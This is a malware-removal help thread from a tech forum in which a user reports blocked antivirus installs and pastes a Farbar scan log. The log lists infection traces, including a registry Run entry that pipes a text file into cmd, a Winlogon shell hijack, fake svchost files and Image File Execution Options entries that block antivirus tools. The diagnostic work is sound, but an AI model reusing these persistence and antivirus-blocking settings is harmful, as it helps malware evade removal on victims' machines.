Inactive-A Cannot install Malwarebytes, Access to destination is denied

Status
Not open for further replies.

Bruce Betts

TS Rookie
I think my computer is infected. I've been getting errors when I install malwarebytes and other programs. I also can't install any other antivirus software
 

Broni

Malware Annihilator
Welcome aboard


Please, complete all steps listed here: https://www.techspot.com/community/topics/updated-4-step-viruses-spyware-malware-removal-preliminary-instructions.58138/
Make sure, you PASTE all logs. If some log exceeds 50,000 characters post limit, split it between couple of replies.
Attached logs won't be reviewed.

Please, observe following rules:
  • Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
  • If you're stuck, or you're not sure about certain step, always ask before doing anything else.
  • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
  • Never run more than one scan at a time.
  • Keep updating me regarding your computer behavior, good, or bad.
  • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
  • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
  • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.
 
  • Like
Reactions: Bruce Betts

Broni

Malware Annihilator
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24.10.2018
Ran by Betts (administrator) on BETTS-PC (01-11-2018 13:17:57)
Running from C:\Users\Betts\Desktop
Loaded Profiles: Betts (Available Profiles: Betts)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Garena Online ) C:\Program Files (x86)\Garena\Garena\2.0.1808.0718\gxxsvc.exe
(Arcai.com) C:\Program Files (x86)\arcai.com\aips.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Flexera Software LLC) C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
() C:\Windows\KMS-R@1n.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\System Update\UpdateCenterService.exe
() C:\Windows\SysWOW64\Windows Server\wserver.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\arcai.com\netcut_windows.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Viber Media S.Ã r.l.) C:\Users\Betts\AppData\Local\Viber\Viber.exe
(I-Funbox.com) C:\Program Files (x86)\I-Funbox DevTeam\iFunBox_x64.exe
(Microsoft Corporation) C:\ProgramData\audio.exe
() C:\Users\Betts\AppData\Local\Temp\svchost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Spotify Ltd) C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Autodesk Sync] => [X]
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [6879fe793de5f826544fc9bd3b3ae212] => C:\ProgramData\audio.exe .. [285184 2018-08-22] (Microsoft Corporation)
HKLM-x32\...\Run: [svchost.exe] => C:\Users\Betts\AppData\Local\Temp\svchost.exe .. [169984 2018-11-01] () <==== ATTENTION
HKLM\...\Policies\Explorer: [NoAutorun] 1
HKLM\...\Policies\Explorer: [NoViewOnDrive] 0
HKLM\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKLM\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKLM\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKLM\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKLM\...\Policies\Explorer: [NoViewContextMenu] 0
HKLM\...\Policies\Explorer: [NoShellSearchButton] 0
HKLM\...\Policies\Explorer: [NoFind] 0
HKLM\...\Policies\Explorer: [NoFile] 0
HKLM\...\Policies\Explorer: [HideClock] 0
HKLM\...\Policies\Explorer: [NoTrayContextMenu] 0
HKLM\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKLM\...\Policies\Explorer: [NoSetFolders] 0
HKLM\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKLM\...\Policies\Explorer: [NoSetTaskbar] 0
HKLM\...\Policies\Explorer: [NoDeletePrinter] 0
HKLM\...\Policies\Explorer: [NoDFSTab] 0
HKLM\...\Policies\Explorer: [NoChangeStartMenu] 0
HKLM\...\Policies\Explorer: [NoLogoff] 0
HKLM\...\Policies\Explorer: [NoWindowsUpdate] 0
HKLM\...\Policies\Explorer: [NoEncryptOnMove] 0
HKLM\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKLM\...\Policies\Explorer: [NoResolveSearch] 0
HKLM\...\Policies\Explorer: [NoSaveSettings] 0
HKLM\...\Policies\Explorer: [NoHardwareTab] 0
HKLM\...\Policies\Explorer: [NoStartMenuSubFolders] 0
HKLM\...\Policies\Explorer: [NoDesktop] 0
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-19\...\Policies\system: [DisableCMD] 0
HKU\S-1-5-19\...\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-19\...\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-19\...\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-19\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-19\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-19\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-19\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoFind] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoFile] 0
HKU\S-1-5-19\...\Policies\Explorer: [HideClock] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-19\...\Policies\Explorer: [NoStartMenuSubFolders] 0
HKU\S-1-5-20\...\Policies\system: [DisableCMD] 0
HKU\S-1-5-20\...\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-20\...\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-20\...\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-20\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-20\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-20\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-20\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoFind] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoFile] 0
HKU\S-1-5-20\...\Policies\Explorer: [HideClock] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-20\...\Policies\Explorer: [NoStartMenuSubFolders] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [csrss] => cmd /c type C:\Users\Betts\AppData\Local\Temp\csrss.txt | cmd <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8894680 2016-08-06] (Piriform Ltd)
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [Viber] => C:\Users\Betts\AppData\Local\Viber\Viber.exe [35581000 2018-01-30] (Viber Media S.Ã r.l.)
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [Steam] => D:\steam\steam.exe [3208992 2018-10-13] (Valve Corporation)
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [iFunBox] => C:\Program Files (x86)\I-Funbox DevTeam\iFunBox_x64.exe [2992248 2016-09-21] (I-Funbox.com)
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [Spotify] => C:\Users\Betts\AppData\Roaming\Spotify\Spotify.exe [25162472 2018-10-24] (Spotify Ltd)
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [Blogger] => C:\ProgramData\Blogger\Blogger.exe [1078784 2018-08-22] ()
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [6879fe793de5f826544fc9bd3b3ae212] => C:\ProgramData\audio.exe .. [285184 2018-08-22] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Run: [svchost.exe] => C:\Users\Betts\AppData\Local\Temp\svchost.exe .. [169984 2018-11-01] () <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\system: [DisableCMD] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: []
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoFind] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoFile] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [HideClock] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer: [NoStartMenuSubFolders] 0
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Policies\Explorer\DisallowRun: [1] mrt.exe
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\CurrentVersion\Windows: [Load] C:\ProgramData\msanis.exe <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\MountPoints2: {7f7bd46c-632b-11e3-acad-c8600099836d} - F:\bootstrap.exe
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Winlogon: [Shell] explorer.exe,"C:\Windows\SysWOW64\Windows Server\wserver.exe" <==== ATTENTION
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\SysWOW64\lol.scr
HKU\S-1-5-18\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
HKU\S-1-5-18\...\Policies\system: [DisableCMD] 0
HKU\S-1-5-18\...\Policies\system: [NoDispAppearancePage] 0
HKU\S-1-5-18\...\Policies\system: [NoDispBackgroundPage] 0
HKU\S-1-5-18\...\Policies\system: [NoDispSettingsPage] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoViewOnDrive] 0
HKU\S-1-5-18\...\Policies\Explorer: [DisableLocalMachineRun] 0
HKU\S-1-5-18\...\Policies\Explorer: [DisableLocalMachineRunOnce] 0
HKU\S-1-5-18\...\Policies\Explorer: [DisableCurrentUserRun] 0
HKU\S-1-5-18\...\Policies\Explorer: [DisableCurrentUserRunOnce] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoViewContextMenu] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoShellSearchButton] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoFind] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoFile] 0
HKU\S-1-5-18\...\Policies\Explorer: [HideClock] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoTrayContextMenu] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoTrayItemsDisplay] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoSetFolders] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoDevMgrUpdate] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoSetTaskbar] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoDeletePrinter] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoDFSTab] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoWindowsUpdate] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoEncryptOnMove] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoRunasInstallPrompt] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoResolveSearch] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoHardwareTab] 0
HKU\S-1-5-18\...\Policies\Explorer: [NoStartMenuSubFolders] 0
IFEO\AvastSvc.exe: [Debugger] nqij.exe
IFEO\AvastUI.exe: [Debugger] nqij.exe
IFEO\avcenter.exe: [Debugger] nqij.exe
IFEO\avconfig.exe: [Debugger] nqij.exe
IFEO\avgcsrvx.exe: [Debugger] nqij.exe
IFEO\avgidsagent.exe: [Debugger] nqij.exe
IFEO\avgnt.exe: [Debugger] nqij.exe
IFEO\avgrsx.exe: [Debugger] nqij.exe
IFEO\avguard.exe: [Debugger] nqij.exe
IFEO\avgui.exe: [Debugger] nqij.exe
IFEO\avgwdsvc.exe: [Debugger] nqij.exe
IFEO\avp.exe: [Debugger] nqij.exe
IFEO\avscan.exe: [Debugger] nqij.exe
IFEO\bdagent.exe: [Debugger] nqij.exe
IFEO\blindman.exe: [Debugger] nqij.exe
IFEO\ccuac.exe: [Debugger] nqij.exe
IFEO\ComboFix.exe: [Debugger] nqij.exe
IFEO\egui.exe: [Debugger] nqij.exe
IFEO\hijackthis.exe: [Debugger] nqij.exe
IFEO\instup.exe: [Debugger] nqij.exe
IFEO\keyscrambler.exe: [Debugger] nqij.exe
IFEO\mbam.exe: [Debugger] nqij.exe
IFEO\mbamgui.exe: [Debugger] nqij.exe
IFEO\mbampt.exe: [Debugger] nqij.exe
IFEO\mbamscheduler.exe: [Debugger] nqij.exe
IFEO\mbamservice.exe: [Debugger] nqij.exe
IFEO\MpCmdRun.exe: [Debugger] nqij.exe
IFEO\MSASCui.exe: [Debugger] nqij.exe
IFEO\MsMpEng.exe: [Debugger] nqij.exe
IFEO\msseces.exe: [Debugger] nqij.exe
IFEO\OSPPSVC.EXE: [Debugger] KMS-R@1nHook.exe
IFEO\rstrui.exe: [Debugger] nqij.exe
IFEO\SDFiles.exe: [Debugger] nqij.exe
IFEO\SDMain.exe: [Debugger] nqij.exe
IFEO\SDWinSec.exe: [Debugger] nqij.exe
IFEO\SppSvc.exe: [Debugger] KMS-R@1nHook.exe
IFEO\spybotsd.exe: [Debugger] nqij.exe
IFEO\wireshark.exe: [Debugger] nqij.exe
IFEO\zlclient.exe: [Debugger] nqij.exe
ShellExecuteHooks: No Name - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - -> No File
ShellExecuteHooks-x32: No Name - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - -> No File
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinUrl.url -> URL: file:///C:\ProgramData\{97eec164-d800-cec2-f20c-1101c2f4c01b}\hostdl.exe
Startup: C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6879fe793de5f826544fc9bd3b3ae212.exe [2018-08-22] ()
Startup: C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe [2018-11-01] () <==== ATTENTION
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 114.108.195.1 114.108.193.201
Tcpip\..\Interfaces\{C16676BF-0081-46CD-859D-0D985D72397E}: [DhcpNameServer] 114.108.195.1 114.108.193.201

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.apusx.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.apusx.com
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://ph.msn.com/?rd=1&ucc=PH&dcc=PH&opt=0&ocid=iehp
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie
HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.ph/intl/en/
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000 -> {52300438-2215-426A-8181-FB18E65B2D4A} URL = hxxp://q.search-simple.com/?affID=na&q={searchTerms}&r=363
SearchScopes: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.google.com/search?q={sear
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2014-11-12] (Microsoft Corporation)
BHO: No Name -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> No File
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-21] (Microsoft Corporation)
BHO: Webroot Filtering Extension -> {C9C42510-9B41-42c1-9DCD-7282A2D07C61} -> C:\Program Files\Common Files\Webroot\WebFiltering\wrflt.dll [2017-12-07] (Webroot)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2014-11-12] (Microsoft Corporation)
BHO-x32: No Name -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> No File
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2014-11-12] (Microsoft Corporation)
BHO-x32: No Name -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> No File
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\ssv.dll [2015-03-30] (Oracle Corporation)
BHO-x32: ArcPluginIEBHO Class -> {84BFE29A-8139-402a-B2A4-C23AE9E1A75F} -> C:\Program Files (x86)\Perfect World Entertainment\Arc\plugins\ArcPluginIE.dll [2017-04-28] (Perfect World Entertainment Inc)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO-x32: Webroot Filtering Extension -> {C9C42510-9B41-42c1-9DCD-7282A2D07C61} -> C:\Program Files (x86)\Common Files\Webroot\WebFiltering\wrflt.dll [2017-12-07] (Webroot)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2014-11-12] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_40\bin\jp2ssv.dll [2015-03-30] (Oracle Corporation)
Toolbar: HKLM - No Name - {97ab88ef-346b-4179-a0b1-7445896547a5} - No File
Toolbar: HKLM-x32 - No Name - {97ab88ef-346b-4179-a0b1-7445896547a5} - No File
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL No File
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL No File
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - No File

FireFox:
========
FF ProfilePath: C:\Users\Betts\AppData\Roaming\Netscape\Navigator\Profiles\wb66fkfq.default [2016-11-27]
FF Extension: (No Name) - C:\Program Files (x86)\Netscape\Navigator 9\extensions\inspector@mozilla.org [not found]
FF Extension: (No Name) - C:\Program Files (x86)\Netscape\Navigator 9\extensions\netscape9migrator@flock.com [not found]
FF ProfilePath: C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default [2018-11-01]
FF NewTab: Mozilla\Firefox\Profiles\7o4jccun.default -> hxxp://ph.search.yahoo.com/?fr=hp-ddc-bd-tab&type=608_pr__alt__ddc_dsssyctab_bd_com
FF NetworkProxy: Mozilla\Firefox\Profiles\7o4jccun.default -> type", 0
FF Extension: (Do Not Survey) - C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default\Extensions\do-not-survey@erikvold.com.xpi [2016-05-01] [Legacy]
FF Extension: (Groove Shredder) - C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default\Extensions\grooveshredder@code.argee.org.xpi [2016-05-01] [Legacy]
FF Extension: (leethax.net extension) - C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default\Extensions\leethax@leethax.net.xpi [2014-01-04] [Legacy] [not signed]
FF Extension: (Stylish - Custom themes for any website) - C:\Users\Betts\AppData\Roaming\Mozilla\Firefox\Profiles\7o4jccun.default\Extensions\{46551EC9-40F0-4e47-8E18-8E5CF550CFB8}.xpi [2018-08-17]
